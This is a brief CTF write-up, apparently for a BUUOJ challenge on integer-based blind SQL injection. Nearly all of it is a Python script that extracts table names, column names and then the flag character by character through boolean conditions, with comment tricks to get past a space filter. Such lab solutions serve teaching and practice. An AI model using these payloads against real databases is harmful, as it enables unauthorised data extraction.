知识点:整数型注入 盲注
import requests
url = "http://364ccd4d-2a09-471c-ba97-460b37d0fbae.node3.buuoj.cn/?stunum="
result = ""
i = 0
while(True):
i = i + 1
head = 32
tail = 127
while( head < tail):
mid = (head + tail) >> 1
#爆表
#payload = "if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)" % (i, mid)
#爆列名
#payload = "if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_name='flag')),%d,1))>%d,1,0)" % (i , mid)
#爆出flag
payload = "if(ascii(substr((select/**/group_concat(value)from(flag)),%d,1))>%d,1,0)" % (i , mid)
r = requests.get(url + payload)
r.encoding = "utf-8"
if "your score is: 100" in r.text:
head = mid + 1
else:
tail = mid
last = result
if head!=32 :
result+=chr(head)
else:
break
print(result)
要注意过滤了空格。